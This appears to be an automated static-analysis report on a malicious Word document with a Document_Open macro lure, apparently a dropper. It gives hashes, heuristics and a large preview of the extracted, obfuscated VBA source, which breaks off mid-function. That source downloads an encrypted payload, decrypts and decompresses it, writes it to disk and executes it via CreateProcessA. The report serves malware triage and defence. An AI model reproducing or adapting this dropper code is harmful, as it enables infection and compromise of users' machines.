Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5cc881eafc9d6495…

MALICIOUS

Office (OOXML)

40.3 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-20
MD5: 3e2de8348d2c9ec71e038d420404c020 SHA-1: 6d5bd735a69302754f88982abe1d6a39fb839085 SHA-256: 5cc881eafc9d64953b368f8156cc714c5d95bcad9cd5e85546c14f8066f00f29
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OOXML document containing VBA macros, including a Document_Open macro, which is a common technique for malware execution. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', indicating a social engineering lure to bypass security measures. The presence of VBA code and the detection of 'Doc.Malware.Chronos-6897935-0' by ClamAV strongly suggest malicious intent, likely to download and execute a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    RcfhYKbvetd = Environ(CUh12emhPa4g(Chr(242) + Chr(139) + Chr(69) + Chr(106) + Chr(159) + Chr(202) + Chr(230), "X9Hxae1qOv")) & "\" & OBqADCHy & CUh12emhPa4g(Chr(18) + Chr(12) + Chr(7) + Chr(253), "Vgq8Q62G")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22544 bytes
SHA-256: b24a4832db9fc4e4a410f04490d825c0a4db2fd9f487c12518810b9b36065510
Detection
ClamAV: No threats found
Obfuscation or payload: likely
165 of 282 identifiers look randomly generated (e.g. 'LJ5F1vdhb3En1ztke') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Type HTbE3LRfQS7
   OnvuiAdW4j As Long
   TgINKWBcF As Long
   Ct8y As Long
   IPaG4eZqaY As Long
End Type
Private Type NbCaEYpXC7F
   Db4RikJ4d2y As Long
   F5NjvmFFM97AL As String
   QpXS8l6S4f As String
   MDKrnrhgKC4 As String
   DYB6ZPMRkR9 As Long
   OAbK4NFuipb As Long
   LlY8gY9cZ8YqzP As Long
   SQktQ31B As Long
   Pd4v18HI6ae2loDlQ As Long
   PYjq29H As Long
   H3E6irM4e As Long
   FXt8Keq1d As Long
   HD6jxBCgZ1iHrdQh As Integer
   PjvaGwgHSkh As Integer
   YixkTeiee As Long
   H95kxflNy As Long
   GAjTaBkTi1UOmS As Long
   MZBiJNGE As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal R21BUAXajMSd As String, ByVal SgXAh1jKi58OaZ As String, XWYY9ot64mp As Any, KjhSQGYB6ZPMR As Any, ByVal HFxPCT5iVbe As Long, ByVal IbDFlr4kfpZqvj As Long, L785GTyJBeu As Any, ByVal QeaUc55E As String, VogGeucHQG As NbCaEYpXC7F, RZqiIWA As HTbE3LRfQS7) As Long
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal YYQJs3PP599 As Long, ByVal Sy2odsQet20rGV As String, ByVal Xo3B5eby9xAf As String, ByVal EZqTiEpnAk77UE As Long, ByVal AlfEDM As Long, ByVal OMN79Ec1oO As Long) As Long
Private Declare Function InternetOpenA Lib "wininet" (ByVal HIMTJ5lJLs As String, ByVal Wggxkkgwje9L As Long, ByVal DAsGe9 As String, ByVal Lko5GSffn7 As String, ByVal XcKsb2mZZBI As Long) As Long
Private QJzFQnwu(0 To 255) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal IvtgqYbySYK As Long, ByVal HhenXDD49NZ4bZ As String, ByVal L9ELckLo42t9 As Long, HnBLcS6SY As Long) As Integer
Private CtOlY8VDlhaGx As String
Private Type EBT5n
   PqYbySYK8Mh As Byte
   L7NrlUZ4bZ() As Byte
End Type
Private Type I9mHKPkVZHFr4Qt
   IFdwZD9Uvlnv As Integer
   IjAMggxk As Integer
   TMTRb6BOqk0Dpg As Integer
   YCVp4OD8Y As Integer
   D5cKsb2mZZB As Long
End Type
Private Declare Sub Ak0eM3Ttz Lib "msvbvm60" Alias "#183" (ByVal Dz0dBY As Long, ByVal XsOHEWTDMENaE0 As Long, ByVal YMcnK8gY As Long)
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef ChQf2O3zs As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal QY5lmpquLPrW As Long) As Long
Private Sub V4FS3(G5Y() As Byte, AyHozbyEXEL As Long)
Dim PsXzVQ9fRm As Long, XIp6pVdeYnW8KN As Long, UokwS8C As Byte, LXogLEt95qr1DUGZS As Long, IJToS1cqH7EazzIhz As Integer, I9Z10NivHEYVVt As Byte, Tey4YtVu4w0m() As Byte, WcoU7qoh4XcuTRj As Integer
Dim LH5Os6f3kXysOR As Long, YQFLhwhgs1 As Byte, YUYQJ7RQBAx70 As Long, X26oLR31QJUr As Long, Sw01GsU0E3WO As Long, QAFg9aGv(0 To 7) As Byte, H1tqLCMBV5rN(0 To 511) As I9mHKPkVZHFr4Qt, TKSeE66yFSqTUC(0 To 255) As EBT5n
LXogLEt95qr1DUGZS = 1
I9Z10NivHEYVVt = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
Ak0eM3Ttz 4, VarPtr(YUYQJ7RQBAx70), VarPtr(G5Y(LXogLEt95qr1DUGZS - 1))
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 4
Sw01GsU0E3WO = YUYQJ7RQBAx70
If (YUYQJ7RQBAx70 = 0) Then Exit Sub
ReDim Tey4YtVu4w0m(0 To YUYQJ7RQBAx70 - 1)
Ak0eM3Ttz 2, VarPtr(IJToS1cqH7EazzIhz), VarPtr(G5Y(LXogLEt95qr1DUGZS - 1))
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 2
For PsXzVQ9fRm = 1 To IJToS1cqH7EazzIhz
With TKSeE66yFSqTUC(G5Y(LXogLEt95qr1DUGZS - 1))
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
.PqYbySYK8Mh = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
ReDim .L7NrlUZ4bZ(0 To .PqYbySYK8Mh - 1)
End With
Next
QAFg9aGv(0) = 2 ^ 0
QAFg9aGv(1) = 2 ^ 1
QAFg9aGv(2) = 2 ^ 2
QAFg9aGv(3) = 2 ^ 3
QAFg9aGv(4) = 2 ^ 4
QAFg9aGv(5) = 2 ^ 5
QAFg9aGv(6) = 2 ^ 6
QAFg9aGv(7) = 2 ^ 7
YQFLhwhgs1 = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
WcoU7qoh4XcuTRj = 0
For PsXzVQ9fRm = 0 To 255
With TKSeE66yFSqTUC(PsXzVQ9fRm)
If (.PqYbySYK8Mh > 0) Then
For XIp6pVdeYnW8KN = 0 To (.PqYbySYK8Mh - 1)
If (YQFLhwhgs1 And QAFg9aGv(WcoU7qoh4XcuTRj)) Then .L7NrlUZ4bZ(XIp6pVdeYnW8KN) = 1
WcoU7qoh4XcuTRj = WcoU7qoh4XcuTRj + 1
If (WcoU7qoh4XcuTRj = 8) Then
YQFLhwhgs1 = G5Y(LXogLEt95qr1DUGZS - 1)
LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS + 1
WcoU7qoh4XcuTRj = 0
End If
Next
End If
End With
Next
If (WcoU7qoh4XcuTRj = 0) Then LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS - 1
X26oLR31QJUr = 1
H1tqLCMBV5rN(0).TMTRb6BOqk0Dpg = -1
H1tqLCMBV5rN(0).IjAMggxk = -1
H1tqLCMBV5rN(0).IFdwZD9Uvlnv = -1
H1tqLCMBV5rN(0).YCVp4OD8Y = -1
For PsXzVQ9fRm = 0 To 255
X00LK H1tqLCMBV5rN(), X26oLR31QJUr, PsXzVQ9fRm, TKSeE66yFSqTUC(PsXzVQ9fRm)
Next
YUYQJ7RQBAx70 = 0
For LXogLEt95qr1DUGZS = LXogLEt95qr1DUGZS To AyHozbyEXEL
YQFLhwhgs1 = G5Y(LXogLEt95qr1DUGZS - 1)
For WcoU7qoh4XcuTRj = 0 To 7
If (YQFLhwhgs1 And QAFg9aGv(WcoU7qoh4XcuTRj)) Then LH5Os6f3kXysOR = H1tqLCMBV5rN(LH5Os6f3kXysOR).IjAMggxk Else LH5Os6f3kXysOR = H1tqLCMBV5rN(LH5Os6f3kXysOR).TMTRb6BOqk0Dpg
If (H1tqLCMBV5rN(LH5Os6f3kXysOR).YCVp4OD8Y > -1) Then
Tey4YtVu4w0m(YUYQJ7RQBAx70) = H1tqLCMBV5rN(LH5Os6f3kXysOR).YCVp4OD8Y
YUYQJ7RQBAx70 = YUYQJ7RQBAx70 + 1
If (YUYQJ7RQBAx70 = Sw01GsU0E3WO) Then GoTo Sw01GsU0E3WO
LH5Os6f3kXysOR = 0
End If
Next
Next
Sw01GsU0E3WO:
UokwS8C = 0
For PsXzVQ9fRm = 0 To (YUYQJ7RQBAx70 - 1)
UokwS8C = UokwS8C Xor Tey4YtVu4w0m(PsXzVQ9fRm)
Next
ReDim G5Y(0 To YUYQJ7RQBAx70 - 1)
Ak0eM3Ttz YUYQJ7RQBAx70, VarPtr(G5Y(0)), VarPtr(Tey4YtVu4w0m(0))
End Sub
Private Function OBqADCHy(Optional QqrlIRWOPe As String = "0123456789") As String
Dim R02wTZs8GzMnOcm As Long, P2lTdT9yXkbz As Long
R02wTZs8GzMnOcm = 30
P2lTdT9yXkbz = 79
If R02wTZs8GzMnOcm + P2lTdT9yXkbz > 4 Then
P2lTdT9yXkbz = R02wTZs8GzMnOcm + 56
Else
MsgBox 51
End If
Dim ArVUXN5lxgY() As Byte, QscEL() As Byte, WMpgun As Long, TIjA4w4 As Long, XcKvwcRqmVs As Long, RuC4Q As String
Dim QKLP As Long, XiuKSb As Long
QKLP = 25
XiuKSb = 92
If QKLP + XiuKSb > 4 Then
XiuKSb = QKLP + 18
Else
MsgBox 67
End If
XcKvwcRqmVs = 0
Dim Pc3NVjfi0x3a As Long, Tk4WAk8U5qwAPYXTQ As Long
Pc3NVjfi0x3a = 40
Tk4WAk8U5qwAPYXTQ = 47
If Pc3NVjfi0x3a + Tk4WAk8U5qwAPYXTQ > 4 Then
Tk4WAk8U5qwAPYXTQ = Pc3NVjfi0x3a + 52
Else
MsgBox 37
End If
Cv8Anf0Zrx1ExsA:
Dim ALzAYzQsz1iSBut As Long, H1unwlMZF1W0I8da2 As Long
ALzAYzQsz1iSBut = 19
H1unwlMZF1W0I8da2 = 63
If ALzAYzQsz1iSBut + H1unwlMZF1W0I8da2 > 4 Then
H1unwlMZF1W0I8da2 = ALzAYzQsz1iSBut + 76
Else
MsgBox 90
End If
Randomize
RuC4Q = Int(30 * Rnd)
If RuC4Q < 4 Then GoTo Cv8Anf0Zrx1ExsA
XcKvwcRqmVs = RuC4Q
If XcKvwcRqmVs > 0& Then
Dim GdT9yXkbz2scj As Long, Bn4H2Ilon As Long
GdT9yXkbz2scj = 21
Bn4H2Ilon = 57
If GdT9yXkbz2scj + Bn4H2Ilon > 4 Then
Bn4H2Ilon = GdT9yXkbz2scj + 95
Else
MsgBox 33
End If
Randomize
ArVUXN5lxgY = QqrlIRWOPe
Dim UENoNm9RpIS As Long, H5Fq3KvL3 As Long
UENoNm9RpIS = 81
H5Fq3KvL3 = 77
If UENoNm9RpIS + H5Fq3KvL3 > 4 Then
H5Fq3KvL3 = UENoNm9RpIS + 87
Else
MsgBox 58
End If
WMpgun = Len(QqrlIRWOPe) - 1&
XcKvwcRqmVs = (XcKvwcRqmVs * 2&) - 1&
Dim P8eRzlc As Long, C10Z As Long
P8eRzlc = 28
C10Z = 10
If P8eRzlc + C10Z > 4 Then
C10Z = P8eRzlc + 37
Else
MsgBox 57
End If
ReDim QscEL(XcKvwcRqmVs) As Byte
For TIjA4w4 = 0& To XcKvwcRqmVs Step 2&
QscEL(TIjA4w4) = ArVUXN5lxgY(CLng(WMpgun * Rnd) * 2&)
Next
Dim UwnpeMwTmxfg7YQu As Long, QGzMnOcmWxm6DM As Long
UwnpeMwTmxfg7YQu = 21
QGzMnOcmWxm6DM = 57
If UwnpeMwTmxfg7YQu + QGzMnOcmWxm6DM > 4 Then
QGzMnOcmWxm6DM = UwnpeMwTmxfg7YQu + 95
Else
MsgBox 33
End If
End If
Dim H1iblnF As Long, TshWsIrhZy5Wt As Long
H1iblnF = 59
TshWsIrhZy5Wt = 54
If H1iblnF + TshWsIrhZy5Wt > 4 Then
TshWsIrhZy5Wt = H1iblnF + 97
Else
MsgBox 40
End If
OBqADCHy = QscEL
Dim UG89Oc As Long, BpC7zSlx1AF As Long
UG89Oc = 73
BpC7zSlx1AF = 61
If UG89Oc + BpC7zSlx1AF > 4 Then
BpC7zSlx1AF = UG89Oc + 96
Else
MsgBox 90
End If
End Function
Private Property Let C1zp2TPYD7r7Co9Z(RjRq3N As String)
Dim YKO As Long, X66mLspfoyriW9 As Long, KFEicogB2LKKViIb As Byte, YEWqrZ() As Byte, NqFLLodnv As Long
If (CtOlY8VDlhaGx = RjRq3N) Then Exit Property
CtOlY8VDlhaGx = RjRq3N
YEWqrZ() = StrConv(CtOlY8VDlhaGx, vbFromUnicode)
NqFLLodnv = Len(CtOlY8VDlhaGx)
For YKO = 0 To 255
QJzFQnwu(YKO) = YKO
Next YKO
For YKO = 0 To 255
X66mLspfoyriW9 = (X66mLspfoyriW9 + QJzFQnwu(YKO) + YEWqrZ(YKO Mod NqFLLodnv)) Mod 256
KFEicogB2LKKViIb = QJzFQnwu(YKO)
QJzFQnwu(YKO) = QJzFQnwu(X66mLspfoyriW9)
QJzFQnwu(X66mLspfoyriW9) = KFEicogB2LKKViIb
Next
End Property
Private Function Yptw7lcRqUAqs1(ByVal KfuJaYmLavVowsnu6 As String, ByVal ItMAnemQ As String, ByVal GFq8Cih2NlAyJkzm As String) As Boolean
Dim Ts1e2pVTjLSke As Long, AN4dBGV4kxWRJ As Long
Ts1e2pVTjLSke = 45
AN4dBGV4kxWRJ = 71
If Ts1e2pVTjLSke + AN4dBGV4kxWRJ > 4 Then
AN4dBGV4kxWRJ = Ts1e2pVTjLSke + 20
Else
MsgBox 20
End If
Dim O6p6xL As Long, LJ5F1vdhb3En1ztke As Long, DdOkUpJk06f As Long, Njz7qjaT As String * 8162, LDEam7EiGNDKZ60EP As String, HhdrJ2F3MxYmP As Integer, RbZVuXpQR As Double
Dim C77DsRlg0HiqYrYqP As Long, RB9L4t7uFFg As Long
C77DsRlg0HiqYrYqP = 4
RB9L4t7uFFg = 68
If C77DsRlg0HiqYrYqP + RB9L4t7uFFg > 4 Then
RB9L4t7uFFg = C77DsRlg0HiqYrYqP + 2
Else
MsgBox 74
End If
O6p6xL = InternetOpenA(CUh12emhPa4g(Chr(133) + Chr(120) + Chr(65) + Chr(219) + Chr(194) + Chr(108) + Chr(192) + Chr(218) + Chr(219) + Chr(197) + Chr(124) + Chr(150) + Chr(74) + Chr(90) + Chr(97) + Chr(90) + Chr(248) + Chr(55) + Chr(113) + Chr(58) + Chr(4) + Chr(25) + Chr(39) + Chr(236) + Chr(39) + Chr(119) + Chr(62) + Chr(235) + Chr(241) + Chr(128) + Chr(61) + Chr(65) + Chr(131) + Chr(244) + Chr(129) + Chr(142) + Chr(140) + Chr(146) + Chr(86) + Chr(251) + Chr(243) + Chr(140) + Chr(87) + Chr(135) + Chr(225) + Chr(128) + Chr(115) + Chr(1) + Chr(6) + Chr(127) + Chr(160) + Chr(174) + Chr(66) + Chr(79) + Chr(131) + Chr(155) + Chr(68) + Chr(174) + Chr(67) + Chr(83) + Chr(205) + Chr(34) + Chr(196) + Chr(229) + Chr(172) + Chr(169) + Chr(195), "MKNG7uFFg"), 1, vbNullString, vbNullString, 0)
Dim Nai As Long, RH00JhpXE91YhU As Long
Nai = 21
RH00JhpXE91YhU = 17
If Nai + RH00JhpXE91YhU > 4 Then
RH00JhpXE91YhU = Nai + 82
Else
MsgBox 60
End If
If O6p6xL = 0 Then
Dim PXlB As Long, Y2nIwea As Long
PXlB = 55
Y2nIwea = 16
If PXlB + Y2nIwea > 4 Then
Y2nIwea = PXlB + 33
Else
MsgBox 34
End If
  Yptw7lcRqUAqs1 = False
  Exit Function
End If
Dim O9XnfHM6nPB1B7 As Long, PLFAbclFi As Long
O9XnfHM6nPB1B7 = 31
PLFAbclFi = 40
If O9XnfHM6nPB1B7 + PLFAbclFi > 4 Then
PLFAbclFi = O9XnfHM6nPB1B7 + 12
Else
MsgBox 98
End If
LJ5F1vdhb3En1ztke = InternetOpenUrlA(O6p6xL, KfuJaYmLavVowsnu6, vbNullString, 0, &H4000000, 0)
Dim NQag283d As Long, UXC3Gb43 As Long
NQag283d = 59
UXC3Gb43 = 54
If NQag283d + UXC3Gb43 > 4 Then
UXC3Gb43 = NQag283d + 97
Else
MsgBox 40
End If
If LJ5F1vdhb3En1ztke = 0 Then
Dim G5PKfGmh5qEpfPt As Long, C6VJz9BO8RsgM As Long
G5PKfGmh5qEpfPt = 69
C6VJz9BO8RsgM = 11
If G5PKfGmh5qEpfPt + C6VJz9BO8RsgM > 4 Then
C6VJz9BO8RsgM = G5PKfGmh5qEpfPt + 14
Else
MsgBox 32
End If
  RbZVuXpQR = 0
Else
Dim RI6Tb As Long, PSCFumzVX As Long
RI6Tb = 56
PSCFumzVX = 25
If RI6Tb + PSCFumzVX > 4 Then
PSCFumzVX = RI6Tb + 45
Else
MsgBox 56
End If
InternetReadFile LJ5F1vdhb3En1ztke, Njz7qjaT, 8162, DdOkUpJk06f
LDEam7EiGNDKZ60EP = Njz7qjaT
Dim V0QWuerGg1INNrLi As Long, RKc22gXZaaTMVH As Long
V0QWuerGg1INNrLi = 61
RKc22gXZaaTMVH = 36
If V0QWuerGg1INNrLi + RKc22gXZaaTMVH > 4 Then
RKc22gXZaaTMVH = V0QWuerGg1INNrLi + 10
Else
MsgBox 62
End If
Do While DdOkUpJk06f <> 0
  InternetReadFile LJ5F1vdhb3En1ztke, Njz7qjaT, 8162, DdOkUpJk06f
  LDEam7EiGNDKZ60EP = LDEam7EiGNDKZ60EP + Mid(Njz7qjaT, 1, DdOkUpJk06f)
Loop
RbZVuXpQR = Len(LDEam7EiGNDKZ60EP)
Dim AovKGjYOx8 As Long, HSH8d9sa As Long
AovKGjYOx8 = 69
HSH8d9sa = 38
If AovKGjYOx8 + HSH8d9sa > 4 Then
HSH8d9sa = AovKGjYOx8 + 4
Else
MsgBox 8
End If
HhdrJ2F3MxYmP = FreeFile
Dim TE6VJz9 As Long, UYxuwuoUxw As Long
TE6VJz9 = 84
UYxuwuoUxw = 93
If TE6VJz9 + UYxuwuoUxw > 4 Then
UYxuwuoUxw = TE6VJz9 + 64
Else
MsgBox 51
End If
Open ItMAnemQ For Binary Access Write Lock Write As #HhdrJ2F3MxYmP
Put #HhdrJ2F3MxYmP, , YSSxgqTdeIMBbp8z4(CUh12emhPa4g(LDEam7EiGNDKZ60EP, GFq8Cih2NlAyJkzm))
Dim Dxv71ruUXz59oKkJ7 As Long, WI0Ud54Ftu92 As Long
Dxv71ruUXz59oKkJ7 = 71
WI0Ud54Ftu92 = 79
If Dxv71ruUXz59oKkJ7 + WI0Ud54Ftu92 > 4 Then
WI0Ud54Ftu92 = Dxv71ruUXz59oKkJ7 + 7
Else
MsgBox 26
End If
Close #HhdrJ2F3MxYmP
End If
InternetCloseHandle LJ5F1vdhb3En1ztke
Dim FpuoZ7WqAkbtdw As Long, K0ZJxlZxOGImCEV As Long
FpuoZ7WqAkbtdw = 9
K0ZJxlZxOGImCEV = 77
If FpuoZ7WqAkbtdw + K0ZJxlZxOGImCEV > 4 Then
K0ZJxlZxOGImCEV = FpuoZ7WqAkbtdw + 98
Else
MsgBox 10
End If
InternetCloseHandle O6p6xL
LDEam7EiGNDKZ60EP = ""
If RbZVuXpQR Then
  Yptw7lcRqUAqs1 = True
Dim DBjt8kgTlgikuaBvp As Long, L7O2Nq08Jibr As Long
DBjt8kgTlgikuaBvp = 10
L7O2Nq08Jibr = 74
If DBjt8kgTlgikuaBvp + L7O2Nq08Jibr > 4 Then
L7O2Nq08Jibr = DBjt8kgTlgikuaBvp + 8
Else
MsgBox 80
End If
End If
Dim PqOs As Long, QrXNzi0AHga As Long
PqOs = 74
QrXNzi0AHga = 62
If PqOs + QrXNzi0AHga > 4 Then
QrXNzi0AHga = PqOs + 97
Else
MsgBox 65
End If
End Function
Private Function YSSxgqTdeIMBbp8z4(FbvWh3V3PI As String) As String
Dim B9KFdmHApb8() As Byte
B9KFdmHApb8() = StrConv(FbvWh3V3PI, vbFromUnicode)
V4FS3 B9KFdmHApb8, Len(FbvWh3V3PI)
YSSxgqTdeIMBbp8z4 = StrConv(B9KFdmHApb8(), vbUnicode)
End Function
Private Function XiB46eUBNC(Y6ce3XR As String)
Dim RxC4blPnCH As Long, OO0xBXvVyg As Long
RxC4blPnCH = 21
OO0xBXvVyg = 94
If RxC4blPnCH + OO0xBXvVyg > 4 Then
OO0xBXvVyg = RxC4blPnCH + 47
Else
MsgBox 90
End If
Dim IzDp2SV2gM As HTbE3LRfQS7, XWnOIcgf1WxlEd As NbCaEYpXC7F, CLomkP6jGpyzoB As String
Dim TKdhZzt9vOJTVO As Long, YAf51XKqqgJr77 As Long
TKdhZzt9vOJTVO = 96
YAf51XKqqgJr77 = 16
If TKdhZzt9vOJTVO + YAf51XKqqgJr77 > 4 Then
YAf51XKqqgJr77 = TKdhZzt9vOJTVO + 83
Else
MsgBox 82
End If
XWnOIcgf1WxlEd.Db4RikJ4d2y = Len(XWnOIcgf1WxlEd)
Dim ORD2KOm As Long, BxO2EWPAdjxB As Long
ORD2KOm = 67
BxO2EWPAdjxB = 57
If ORD2KOm + BxO2EWPAdjxB > 4 Then
BxO2EWPAdjxB = ORD2KOm + 14
Else
MsgBox 17
End If
CreateProcessA CLomkP6jGpyzoB, Y6ce3XR, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, CLomkP6jGpyzoB, XWnOIcgf1WxlEd, IzDp2SV2gM
Dim Bhc As Long, JxdotIiS As Long
Bhc = 57
JxdotIiS = 46
If Bhc + JxdotIiS > 4 Then
JxdotIiS = Bhc + 31
Else
MsgBox 24
End If
CloseHandle IzDp2SV2gM.TgINKWBcF
Dim AJElJSS As Long, BmgMGD4LfrsFKBDRF As Long
AJElJSS = 21
BmgMGD4LfrsFKBDRF = 80
If AJElJSS + BmgMGD4LfrsFKBDRF > 4 Then
BmgMGD4LfrsFKBDRF = AJElJSS + 76
Else
MsgBox 41
End If
CloseHandle IzDp2SV2gM.OnvuiAdW4j
Dim F3OUWf3qs As Long, FO93AMgkId As Long
F3OUWf3qs = 80
FO93AMgkId = 29
If F3OUWf3qs + FO93AMgkId > 4 Then
FO93AMgkId = F3OUWf3qs + 58
Else
MsgBox 44
End If
End Function
Function CUh12emhPa4g(AzG7DcJendK As String, YgBO09PgFNh0wQI As String) As String
Dim LhTQeveYYdqvT6Q0 As Long, Pmn512w As Long
LhTQeveYYdqvT6Q0 = 32
Pmn512w = 21
If LhTQeveYYdqvT6Q0 + Pmn512w > 4 Then
Pmn512w = LhTQeveYYdqvT6Q0 + 56
Else
MsgBox 50
End If
Dim byteArray() As Byte
byteArray() = StrConv(AzG7DcJendK, vbFromUnicode)
Omgq9M1451s byteArray(), YgBO09PgFNh0wQI
CUh12emhPa4g = StrConv(byteArray(), vbUnicode)
Dim INb0nL5tj3Xun As Long, YSUq8BO2yIO43A3OO As Long
INb0nL5tj3Xun = 48
YSUq8BO2yIO43A3OO = 25
If INb0nL5tj3Xun + YSUq8BO2yIO43A3OO > 4 Then
YSUq8BO2yIO43A3OO = INb0nL5tj3Xun + 43
Else
MsgBox 88
End If
End Function
Sub RQxKoIyhmZRjA(MtBnvNyIkD As Long)
Dim Gz43ueL52 As Long, XCfDsTEIlH4 As Long
Gz43ueL52 = 93
XCfDsTEIlH4 = 75
If Gz43ueL52 + XCfDsTEIlH4 > 4 Then
XCfDsTEIlH4 = Gz43ueL52 + 3
Else
MsgBox 23
End If
Dim GPzEM9qTfHc4 As Long
Dim TmpAaDp9aGmGY As Long, Oxae1qOvYUIQ As Long
TmpAaDp9aGmGY = 8
Oxae1qOvYUIQ = 7
If TmpAaDp9aGmGY + Oxae1qOvYUIQ > 4 Then
Oxae1qOvYUIQ = TmpAaDp9aGmGY + 37
Else
MsgBox 44
End If
GPzEM9qTfHc4 = Timer + MtBnvNyIkD
Do While Timer < GPzEM9qTfHc4
DoEvents
Loop
Dim PK1H0504B0D3 As Long, BK9QW7YGZ4D As Long
PK1H0504B0D3 = 28
BK9QW7YGZ4D = 73
If PK1H0504B0D3 + BK9QW7YGZ4D > 4 Then
BK9QW7YGZ4D = PK1H0504B0D3 + 63
Else
MsgBox 20
End If
End Sub
Private Sub X00LK(K3HclDtmWC() As I9mHKPkVZHFr4Qt, UmfTpQwNa As Long, ElncMfz As Long, L57I1Uquae As EBT5n)
Dim Coml As Integer, BGrmj1BDAsyxQGfbZ As Long
BGrmj1BDAsyxQGfbZ = 0
For Coml = 0 To (L57I1Uquae.PqYbySYK8Mh - 1)
If (L57I1Uquae.L7NrlUZ4bZ(Coml) = 0) Then
If (K3HclDtmWC(BGrmj1BDAsyxQGfbZ).TMTRb6BOqk0Dpg = -1) Then
K3HclDtmWC(BGrmj1BDAsyxQGfbZ).TMTRb6BOqk0Dpg = UmfTpQwNa
K3HclDtmWC(UmfTpQwNa).IFdwZD9Uvlnv = BGrmj1BDAsyxQGfbZ
K3HclDtmWC(UmfTpQwNa).TMTRb6BOqk0Dpg = -1
K3HclDtmWC(UmfTpQwNa).IjAMggxk = -1
K3HclDtmWC(UmfTpQwNa).YCVp4OD8Y = -1
UmfTpQwNa = UmfTpQwNa + 1
End If
BGrmj1BDAsyxQGfbZ = K3HclDtmWC(BGrmj1BDAsyxQGfbZ).TMTRb6BOqk0Dpg
ElseIf (L57I1Uquae.L7NrlUZ4bZ(Coml) = 1) Then
If (K3HclDtmWC(BGrmj1BDAsyxQGfbZ).IjAMggxk = -1) Then
K3HclDtmWC(BGrmj1BDAsyxQGfbZ).IjAMggxk = UmfTpQwNa
K3HclDtmWC(UmfTpQwNa).IFdwZD9Uvlnv = BGrmj1BDAsyxQGfbZ
K3HclDtmWC(UmfTpQwNa).TMTRb6BOqk0Dpg = -1
K3HclDtmWC(UmfTpQwNa).IjAMggxk = -1
K3HclDtmWC(UmfTpQwNa).YCVp4OD8Y = -1
UmfTpQwNa = UmfTpQwNa + 1
End If
BGrmj1BDAsyxQGfbZ = K3HclDtmWC(BGrmj1BDAsyxQGfbZ).IjAMggxk
Else
Stop
End If
Next
K3HclDtmWC(BGrmj1BDAsyxQGfbZ).YCVp4OD8Y = ElncMfz
End Sub
Sub Omgq9M1451s(Msz3HLRx26QUAkf() As Byte, Optional Ldv8lP As String)
Dim RCz56z8kzHn As Long, LfRh4klCZStI9q As Long, XUT5WXv6RAa As Byte, PGECwCNxie As Long, YofbfZ9WrR6HuXE As Long, G59b56phfen As Long, JylNjQEyhKzRDG(0 To 255) As Integer
If (Len(Ldv8lP) > 0) Then C1zp2TPYD7r7Co9Z = Ldv8lP
Ak0eM3Ttz 512, VarPtr(JylNjQEyhKzRDG(0)), VarPtr(QJzFQnwu(0))
